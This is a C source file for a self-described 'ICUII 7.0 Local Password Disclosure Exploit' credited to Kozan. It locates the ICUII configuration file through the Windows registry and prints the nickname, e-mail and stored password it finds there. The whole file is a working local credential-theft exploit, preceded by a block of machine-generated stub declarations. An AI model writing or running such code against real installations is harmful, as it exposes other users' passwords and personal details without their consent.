
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int LPBYTE ;


 scalar_t__ BUFSIZE ;
 scalar_t__ ERROR_SUCCESS ;
 int HKEY_LOCAL_MACHINE ;
 int KEY_QUERY_VALUE ;
 int RegCloseKey (int ) ;
 scalar_t__ RegOpenKeyEx (int ,char*,int ,int ,int *) ;
 scalar_t__ RegQueryValueEx (int ,char*,int *,int *,int ,scalar_t__*) ;
 scalar_t__ dwBufLen ;
 int hKey ;
 scalar_t__ lRet ;
 char* oku (scalar_t__,char*) ;
 scalar_t__ prgfiles ;
 int printf (char*,...) ;
 int strcat (scalar_t__,char*) ;

int main()
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                       "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey
                                       ) == ERROR_SUCCESS)
       {
       lRet = RegQueryValueEx( hKey, "ProgramFilesDir", ((void*)0), ((void*)0),(LPBYTE) prgfiles,
&dwBufLen);
       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
       {
               RegCloseKey(hKey);
               printf("An error occured!\n");
               return -1;
       }
       RegCloseKey(hKey);
       }

       strcat(prgfiles,"\\icuii\\icuii.ini");

       if(oku(prgfiles,"NickName=")=="")
       {
               printf("ICUII is not installed on your system!\n");
               return -1;
       }

       printf("ICUII 7.0 Local Password Disclosure Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com - www.spyinstructors.com\n");
       printf("kozan@netmagister.com\n\n");

       printf("Nickname: %s\n",oku(prgfiles,"NickName="));
       printf("Location: %s\n",oku(prgfiles,"Location="));
       printf("Comment : %s\n",oku(prgfiles,"Comment="));
       printf("E-Mail  : %s\n",oku(prgfiles,"Email="));
       printf("Password: %s\n",oku(prgfiles,"StartingPW="));






       return 0;
}
